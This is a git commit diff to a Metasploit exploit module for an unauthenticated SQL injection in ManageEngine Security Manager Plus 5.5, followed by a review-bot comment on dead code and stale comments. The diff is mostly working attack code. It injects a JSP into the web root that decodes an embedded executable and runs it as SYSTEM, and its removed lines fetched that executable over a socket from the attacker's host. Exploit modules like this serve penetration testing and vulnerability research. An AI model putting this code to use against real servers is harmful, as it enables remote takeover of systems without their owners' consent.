Write EXE to JSP instead of using a TCPServer

unstable
sinn3r 2012-10-23 11:32:09 -05:00
parent e5ec51a780
commit 923ffe277d
1 changed files with 18 additions and 57 deletions


@ -11,7 +11,6 @@ class Metasploit3 < Msf::Exploit::Remote
Rank = ExcellentRanking Rank = ExcellentRanking
include Msf::Exploit::Remote::HttpClient include Msf::Exploit::Remote::HttpClient
include Msf::Exploit::Remote::TcpServer
include Msf::Exploit::EXE include Msf::Exploit::EXE
def initialize(info={}) def initialize(info={})
@ -19,10 +18,8 @@ class Metasploit3 < Msf::Exploit::Remote
'Name' => "ManageEngine Security Manager Plus 5.5 build 5505 SQL Injection", 'Name' => "ManageEngine Security Manager Plus 5.5 build 5505 SQL Injection",
'Description' => %q{ 'Description' => %q{
This module exploits a SQL injection found in ManageEngine Security Manager Plus This module exploits a SQL injection found in ManageEngine Security Manager Plus
advanced search page. It will send a malicious SQL query to create a JSP file advanced search page, which results in remote code execution under the context of
under the web root directory, and then let it download and execute our malicious SYSTEM. Authentication is not required in order to exploit this vulnerability.
executable under the context of SYSTEM. Authentication is not required in order
to exploit this vulnerability.
}, },
'License' => MSF_LICENSE, 'License' => MSF_LICENSE,
'Author' => 'Author' =>
@ -87,16 +84,6 @@ class Metasploit3 < Msf::Exploit::Remote
end end
#
# Transfer the malicious executable to our victim
#
def on_client_connect(cli)
print_status("#{cli.peerhost}:#{cli.peerport} - Sending executable (#{@native_payload.length} bytes)")
cli.put(@native_payload)
service.close_client(cli)
end
# #
# Generate a download+exe JSP payload # Generate a download+exe JSP payload
# #
@ -104,43 +91,30 @@ class Metasploit3 < Msf::Exploit::Remote
my_host = (datastore['SRVHOST'] == '0.0.0.0') ? Rex::Socket.source_address("50.50.50.50") : datastore['SRVHOST'] my_host = (datastore['SRVHOST'] == '0.0.0.0') ? Rex::Socket.source_address("50.50.50.50") : datastore['SRVHOST']
my_port = datastore['SRVPORT'] my_port = datastore['SRVPORT']
var_buf = Rex::Text.rand_text_alpha(rand(8) + 3) native_payload = Rex::Text.encode_base64(generate_payload_exe)
var_shellcode = Rex::Text.rand_text_alpha(rand(8) + 3) native_payload_name = rand_text_alpha(rand(6)+3)
var_outstream = Rex::Text.rand_text_alpha(rand(8) + 3)
var_socket = Rex::Text.rand_text_alpha(rand(8) + 3)
var_bufreader = Rex::Text.rand_text_alpha(rand(8) + 3)
var_decoder = Rex::Text.rand_text_alpha(rand(8) + 3)
var_temp = Rex::Text.rand_text_alpha(rand(8) + 3)
var_path = Rex::Text.rand_text_alpha(rand(8) + 3)
var_proc = Rex::Text.rand_text_alpha(rand(8) + 3)
jsp = %Q| jsp = %Q|
<%@page import="java.io.*"%> <%@page import="java.io.*"%>
<%@page import="java.net.*"%>
<%@page import="sun.misc.BASE64Decoder"%> <%@page import="sun.misc.BASE64Decoder"%>
<% <%
StringBuffer #{var_buf} = new StringBuffer(); byte[] shellcode = null;
byte[] #{var_shellcode} = null; BufferedOutputStream outstream = null;
BufferedOutputStream #{var_outstream} = null;
try { try {
Socket #{var_socket} = new Socket("#{my_host}", #{my_port}); String buf = "#{native_payload}";
BufferedReader #{var_bufreader} = new BufferedReader(new InputStreamReader(#{var_socket}.getInputStream()));
while (#{var_buf}.length() < #{@native_payload.length}) {
#{var_buf}.append( (char) #{var_bufreader}.read());
}
BASE64Decoder #{var_decoder} = new BASE64Decoder(); BASE64Decoder decoder = new BASE64Decoder();
#{var_shellcode} = #{var_decoder}.decodeBuffer(#{var_buf}.toString()); shellcode = decoder.decodeBuffer(buf.toString());
File #{var_temp} = File.createTempFile("#{@native_payload_name}", ".exe"); File temp = File.createTempFile("#{native_payload_name}", ".exe");
String #{var_path} = #{var_temp}.getAbsolutePath(); String path = temp.getAbsolutePath();
#{var_outstream} = new BufferedOutputStream(new FileOutputStream(#{var_path})); outstream = new BufferedOutputStream(new FileOutputStream(path));
#{var_outstream}.write(#{var_shellcode}); outstream.write(shellcode);
#{var_outstream}.close(); outstream.close();
Process #{var_proc} = Runtime.getRuntime().exec(#{var_path}); Process p = Runtime.getRuntime().exec(path);
} catch (Exception e) {} } catch (Exception e) {}
%> %>
| |
@ -156,9 +130,6 @@ class Metasploit3 < Msf::Exploit::Remote
# Run the actual exploit # Run the actual exploit
# #
def inject_exec def inject_exec
# This little lag is meant to ensure the TCP server runs first before the requests
select(nil, nil, nil, 1)
# Inject our JSP payload # Inject our JSP payload
hex_jsp = generate_jsp_payload hex_jsp = generate_jsp_payload
@ -211,19 +182,9 @@ class Metasploit3 < Msf::Exploit::Remote
# The server must start first, and then we send the malicious requests # The server must start first, and then we send the malicious requests
# #
def exploit def exploit
# Avoid passing this as an argument for performance reasons @jsp_name = rand_text_alpha(rand(6)+3)
# This is in base64 is make sure our file isn't mangled @outpath = "\"../../webapps/SecurityManager/#{@jsp_name + '.jsp'}\""
@native_payload = [generate_payload_exe].pack("m*")
@native_payload_name = rand_text_alpha(rand(6)+3)
@jsp_name = rand_text_alpha(rand(6)+3)
@outpath = "\"../../webapps/SecurityManager/#{@jsp_name + '.jsp'}\""
begin inject_exec
t = framework.threads.spawn("reqs", false) { inject_exec }
print_status("Serving executable on #{datastore['SRVHOST']}:#{datastore['SRVPORT']}")
super
ensure
t.kill
end
end end
end end
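Review bot: `my_host` and `my_port` at the top of the generate_jsp_payload hunk are now dead code — the socket logic that consumed them was removed in the same hunk, and with the `Msf::Exploit::Remote::TcpServer` mixin dropped this module no longer registers SRVHOST/SRVPORT, so `datastore['SRVHOST']` would presumably just yield nil; both lines should be deleted. The enclosing `def generate_jsp_payload` starts outside the hunk. Two comments are left stale by the change: `# Generate a download+exe JSP payload` above generate_jsp_payload (nothing is downloaded any more) and `# The server must start first, and then we send the malicious requests` above `exploit` (there is no server), which I would reword to `# Generate a JSP that writes and runs the embedded executable` and `# Inject the JSP payload and trigger it`. The `'Description'` text in the second hunk was updated consistently, so only these two in-code comments remain out of date.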